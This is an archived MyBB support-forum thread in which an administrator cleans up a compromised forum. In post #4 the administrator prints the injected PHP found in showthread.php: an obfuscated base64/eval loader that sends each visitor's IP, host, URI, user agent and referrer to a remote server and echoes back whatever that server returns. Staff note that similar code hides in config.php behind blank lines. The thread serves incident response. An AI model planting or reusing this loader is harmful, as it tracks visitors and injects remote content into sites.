MyBB Community Forums Community Archive Archived Forums Archived Development and Support MyBB 1.6 1.6 Security Management and Support v
Forum speed/hack problem

Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Threaded Mode
Forum speed/hack problem
ribstaff Offline
Posts: 3
Threads: 1
Joined: Nov 2011
Reputation: 0
#1
2011-11-02, 07:10 PM

Basically my forum had a warning threat which popped up when you went onto it Confused after some research we found out over 3,000,000 sites were effected. My problem now is fixing this as there is some code somwhere in the index which is lagging the site so much.

Going onto the forum is now fixed as there was some corrupt code removed. its just when you click a post it takes for ever Confused

Could anyone give me a heads up on how to fix this as i dont have any backups from before the site was hit?>

www.gaforums.co.uk

Kind regards
Find
faviouz Offline

Former Staff
Posts: 10,063
Threads: 311
Joined: Oct 2008
Reputation: 457
#2
2011-11-02, 07:16 PM
Hmm, only the showthread page seems to be affected. The rest of the site loads nicely. I don't see anything out of the ordinary in your source code that could be slowing down page loads, but I'd re-upload the showthread.php file from a fresh download just to be sure? Also, what does your debug info (at the bottom) say? And which plugins do you have installed?

Find
Booher Offline
Posts: 559
Threads: 39
Joined: Jul 2010
#3
2011-11-02, 07:17 PM (This post was last modified: 2011-11-02, 07:18 PM by Booher.)
I looked at the showthread html source and saw nothing out of the norm.. Post the showthread.php contents here maybe?
Find
ribstaff Offline
Posts: 3
Threads: 1
Joined: Nov 2011
Reputation: 0
#4
2011-11-02, 09:33 PM
Ok i looked in the showthread file and found the same code that was causing the index page to lag:


?><?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>


Code removed and all speedy once again.

Thanks for the reply guys
Find
Josh H. Offline

Former Staff
Posts: 3,791
Threads: 80
Joined: May 2011
Reputation: 94
#5
2011-11-02, 11:05 PM
Glad you found the culprit. It appears as if this was part of the 1.6.4 exploit that was maliciously added by a third party after hacking MyBB's CMS.

FWIW: Check your config.php file for any malicious code. There are many that have said that there was code similar to what you just posted in config.php. Make sure to scroll all the way, as some have said that several blank lines were created to prevent the administrator from noticing it...

Hope this helps. If this helps with nothing, it is better to be safe than sorry.
PGP Key (Fingerprint: 23B6 F4C0 FE2D 45AA 61A0 1E86 DB87 09DC DD87 6E40)
Website Find
ribstaff Offline
Posts: 3
Threads: 1
Joined: Nov 2011
Reputation: 0
#6
2011-11-03, 12:31 AM
No problems thanks for the headsup.
Find


Forum Jump:


Users browsing this thread: 1 Guest(s)